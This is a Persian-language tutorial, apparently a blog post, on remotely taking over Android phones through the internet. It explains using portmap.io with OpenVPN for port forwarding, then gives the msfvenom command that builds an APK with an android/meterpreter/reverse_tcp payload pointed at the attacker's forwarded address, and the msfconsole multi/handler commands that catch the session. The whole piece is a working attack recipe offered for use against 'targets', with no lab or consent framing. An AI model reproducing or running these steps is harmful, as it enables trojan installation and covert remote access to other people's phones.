امروز روش نفوذ به یک اندروید رو می خواهیم بگیم، اما چطوری؟
این نکته را در نظر بگیرد که ممکن برروی بعضی از سمارت فون ها این روش نفوذ جواب ندهد.
معمولا ابزارهای زیادی هستند که در کالی لینوکس برای اینکار استفاده میشود و تمام اموزش های برروی localshot انجام میشود ولی اگر بخواهیم از طریق اینترنت به هدفمون دسترسی داشته باشیم چی؟
همانطور که میدونید ای پی های که برروی رایانه های شخصی تنظیم میشود ایپی های محلی به انها گفته می شود و بیرون از محدودهای مودم یا اینترنت قابل دسترس نیست.
یک روش اینکه یک سروری داشته باشیم که هزینه ای زیادی دارد و نمی صرفه، دو راه دیگر میماند
یکی استفاده از سایت مثل portmap که port forwarding را انجام میدهد استفاده کنیم (خیلی ساده بگیم دری برای دسترسی به اینترنت میدهد)
روش دیگر این است که رایانه خود را تبدیل به سرور کنید، البته نکه بریم یک ای پی عمومی بخریم، از ای پی عمومی که خود ISP به ما داده استفاده کنیم. وقتی توی اینترنت جلمه ی whatis my ip جستجو میکنید ای پی عمومی به نمایش در میاید.
برای روش اول به سایت میریم یک حساب کاربری بازمیکنیم بعد از قسمت config یک پیکربندی برای open vpn درست میکنیم.
بعد به قسمت mapping ruls میریم تا پورت اضافه می کنیم:
یک پورت برای
port on portmap.io
and
port on your pc
هر عددی که می خواهید را میدهید برروی create کلیک میکنید.
حالا اون فایل openvpn را که در config ساخته بود را دانلود و با دستور زیر به ان متصل می شویم:
openvpn -config yourfilename.ovpn
البته سرویس openvpn باید نصب باشد:
apt-get install openvpn
حالا هم میریم سراغ ابزاری که برای نفوذ میخواهیم استفاده کنیم به نام msfvenom:
اولی از همه:
service postgresql start and:
msfvenom android/meterpreter/reverse_tcp lhost=link_add lport=link_port > app.apk
نکته بجای link_port و link-add ادرس های که از سایت گرفتیم در قست ruls استفاده میکنیم:
msfconsole
حالا وقت پیکربندی گیرنده رایانه خودمون است:
use multi/handler
set payload android/meterpreter/reverse_tcp
پورت ها رو تنظیم می کنیم:
set lhost local ip
set lport portlocal
نکته portlocal که میدهیم باید با پورت که برروی سایت در قسمت port on your pc داده ایم یکی باشد، localip هم ای پی محلی خود را میدهیم.
در اخر هم برای دسترسی به هدفمون دستور زیر را اجرا میکنیم:
exploit
این روش تنها بعدی که دارد هربار باید با openvpn به سرور متصل شویم.
نکته جذاب اینکه تازه گی ها API اضافه شده که تمامی کارهای ساخت openvpn و rule را از طریق برنامه نویسی میتونیم این کار انجام بدیم. خیلی هم جذاب چنین برنامه ای را با پایتون بنویسم، یکبار امتحان کنید البته شاید بعدا درباره استفاده از API صحبتی کردیم.